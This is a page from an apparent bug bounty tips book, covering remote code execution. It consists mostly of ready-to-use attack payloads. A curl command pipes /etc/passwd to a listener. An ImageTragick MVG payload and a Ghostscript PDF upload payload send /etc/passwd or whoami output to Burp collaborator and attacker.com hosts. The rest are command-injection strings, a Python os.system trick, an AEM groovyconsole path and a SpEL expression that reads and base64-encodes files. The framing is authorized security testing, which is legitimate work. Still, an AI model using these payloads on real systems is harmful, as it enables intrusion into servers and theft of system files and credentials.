Book of BugBounty Tips
Search
⌃K
Introduction
OSINT / Recon
API
Cross Site Request Forgery (CSRF)
Server Side Request Forgery (SSRF)
Sensitive Information Disclosure
Cross Site Scripting (XSS)
CRLF
Remote Code Execution (RCE)
Email Related
File Upload
Open Redirect
IDOR
Injection
XXE
Local / Remote File Inclusion
Authentication / Authorization
Account Takeover
Application Login
Clickjacking
Parameter Pollution
Fuzzing
Application Logic Bypasses
Bypasses
Mobile
Password Reset
Web Cache
Server Side Template Injection
Tips from @EdOverflow
Tips From @intigriti
Hackpack From @yeswehack
Tips from @YogoshaOfficial
Tips from @Jhaddix
Tips from Ben
Tips from Other Sources
Tips from Blog posts / other hunters
Others
Bugbounty Related Websites / Blogs
Twitter Threads
Docker and k8s
Tweets Collection by @Pentesterland
Windows
Linux
Burp suite
Scope Based Recon Tips
Powered By
GitBook
Remote Code Execution (RCE)
If server only allows GET and POST method, then try adding “X-HTTP-Method -Override: PUT to achieve RCE via PUT method.
Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST
cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=inputid or you can even setup a NC & try request=input&&http://wgetyourserver.com :port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
If you ever get the ability to run arbitrary Python code on a server try to get RCE by running: import os;os.system("ls"); Replacing "ls" with any number of shell commands.
Recon to RCE: Google "upload" site:”target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty
#bugbountytip Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=input`id` or you can even setup a NC & try request=input&&http://wgetyourserver.com:port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
Does the target use AEM? try this path target[.]com/etc/groovyconsole.html and use the payload in the pic If you lucky enough you can have nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips
If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(http://org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())
Previous
CRLF
Next
Email Related
Last modified
1yr ago